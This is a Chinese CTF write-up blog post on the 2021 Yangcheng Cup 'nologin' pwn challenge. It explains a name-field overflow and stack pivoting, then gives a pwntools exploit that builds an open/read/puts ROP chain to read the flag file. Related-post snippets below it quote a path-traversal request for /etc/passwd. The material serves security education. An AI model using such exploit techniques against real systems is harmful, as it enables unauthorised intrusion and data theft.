2021羊城杯 pwn nologin

最新推荐文章于 2022-12-02 14:48:40 发布
最新推荐文章于 2022-12-02 14:48:40 发布
阅读量220 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/120316904
版权

在这里插入图片描述没开canary应该是能溢出

没开NX就是写shellcode

libc是2.27的
在这里插入图片描述

1是user 2是admin
在这里插入图片描述
1的user是一个菜单
在这里插入图片描述

2的admin
在这里插入图片描述admin首先开了沙箱,然后就输入名字。

在这里插入图片描述输入的名字会有一个溢出,溢出可以溢出到上一个admin函数那里,可以多溢出25个字节。

我们只能利用栈迁移,再利用一个read的一半,利用寄存器中残留的值进行输入,然后跳过去就可以了。

exp

#!usr/bin/env python 
#-*- coding:utf8 -*- 
from pwn import * 
 
r = process("./nologin")

r.sendlineafter("input>> \n","2") 

flag_addr = 0x0602020+0x400 
str_addr = 0x0602050 

p.sendlineafter(">password: \n","1"*5+p64(flag_addr)+p64(0x400FF8)) 
p.sendafter("password: \n","a"*0xd+p64(0x4009BC)+"a"*9 ) 
 
read_addr = 0x400780 
open_addr = 0x4007B0 
puts_addr = 0x400730 
p_rdi = 0x401173 
p_rsi_r15 = 0x401171 
p_rdx = 0x6024b0 
 
orw = flat([ 
        p_rdi,flag_addr, 
        p_rsi_r15,0,0, 
        open_addr, 
        p_rdi,4, 
        p_rsi_r15,str_addr,0, 
        p_rdx,0x40, 
        read_addr, 
        p_rdi,str_addr, 
        puts_addr 
]) 
 
r.sendline(("./flag".ljust(8,'\x00')+orw+asm("pop rdx\nret\n")) ) 

r.interactive()
yongbaoii
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
青少年ctf NoLogin
sxy1_的博客
05-28 404
我简单尝试了一下linux命令,;ls可以查到一些文件,里面有flag.php,然后尝试打开它;这里cmd是参数,%3Btac%20/f*,也可以查看flag。
qsnctf NoLogin(克拉玛依市第一届网络安全技能大赛) wp
arcuied
12-14 1231
qsnctf NoLogin(克拉玛依市第一届网络安全技能大赛) wp
青少年CTF训练平台 Web-Easy 登陆试试
xingjinhao123的博客
12-02 1192
青少年CTF训练平台 Web-Easy 登陆试试
CTF-Web渗透
m0_56187372的博客
03-14 658
一道WEB题 target: http://175.27.156.185/case1/ 首先打开目标开启burpsuite发现file参数,一看就有戏呀,可能存在任意文件读取和任意文件下载 尝试一下任意文件读取读取一下etc/passwd GET /case1/show/showfile?file=%2fetc%2fpasswd HTTP/1.1 Host: 175.27.156.185 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64;
青少年CTF-WEB-Queen
m0_63047884的博客
11-22 1154
先抓包这个页面,然后再头部信息里面添加X-Forwarded-For:127.0.0.1。再次发送发现有回显页面,data后面是一串base64加密的值,先解密看一下。解密之后发现是将用户名和密码加密了,想到有可能是sql注入。提交完显示不是管理员的ip,这里想到用xff绕过。然后直接爆它的sql数据库就可以看到flag了。右键将login.php页面复制到文件。用sqlmap -l 跑就可以了。用户名密码随便输入,点击提交。打开环境,是一个网页登录界面。
赣网2021_pwn1.rar
12-11
赣网2021 pwn1 bin ctf
2021莲城比赛题包.zip
10-12
2021莲城比赛题包.zip】是一个压缩包文件,包含了参与2021年莲城网络安全竞赛的相关题目和资料。这个比赛很可能是一个网络安全技术挑战赛,涉及了CTF(Capture The Flag)的形式,这是一种常见的网络安全竞赛...
安恒pwn1
04-25
"安恒pwn1" 本文主要讨论的是安恒pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
赣网2021_pwn2.rar
12-11
赣网2021 pwn1 bin ctf
强网2022 pwn 赛题解析.docx
12-18
【强网2022 Pwn赛题解析】 在网络安全竞赛“强网”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
2020YCBCTF:2020羊城官方writeup及
03-24
2020年 2020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
2020YCBCTF羊城官方Writeup.pdf
10-28
2020YCBCTF羊城官方Writeup.pdf
ctf—夺旗赛smb信息泄露
weixin_43803070的博客
07-10 1995
** 一、协议介绍 ** ** 二、信息探测 ** 扫描开放服务: root@kali:~# nmap -sV 192.168.1.109 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-10 10:39 CST Nmap scan report for 192.168.1.109 Host is up (0.0024s late...
青少年qsnctf [登录试试] 攻略
小苏
11-30 1048
青少年CTF训练平台-Web-Easy-登录试试
WP|2022第六届强网青少赛线上赛WriteUp 中学生CTF 青少年CTF
zxsctf的博客
09-22 5176
这次比赛,非常感谢来自许昌学院的ZIKH26师傅的Pwn、和粥续师傅的Misc,我这次出的题目不多,并且个人排名也不是很靠前。 赛前我们也做了很多次学习、夜以继日的刷题,辛辛苦苦的把这次比赛的线上赛打出了一个还不错的成绩。 非常感谢能够有二位师傅的拼力以赴,才有如今的成绩。 部分题目已经复现放到“青少年CTF平台”中,感兴趣的可以前去作答,不知道平台地址的可以看我们本次文章的副条或百度搜索“青少年CTF”。
青少年CTF平台 misc 我们的秘密是绿色的
zx66661的博客
10-18 1576
青少年CTF平台 misc 我们的秘密是绿色的
*CTF2022 - Web
weixin_51804748的博客
04-17 2962
oh-my-grafana Grafana是一款用Go语言开发的开源数据可视化工具,可以做数据监控和数据统计,带有告警功能。 本题使用的Grafana版本为8.2.6,存在任意文件读取的漏洞(CVE-2021-43798) 由于本题需要登录,首先考虑能不能读取到grafana.ini,获取用户名和密码 在ini文件中搜索得到admin的用户名和密码,成功登录 [security] # disable creation of admin user on first start of grafana ;di
青少年CTF平台 Web签到
zxsctf的博客
10-09 3960
Web一星简单题,Web签到。直接启动环境,等待30秒左右访问题目链接。
2021羊城pwn部分wp
eeeeeight的博客
09-12 6481
前言: 羊城的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
2023 羊城 pwn
最新发布
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值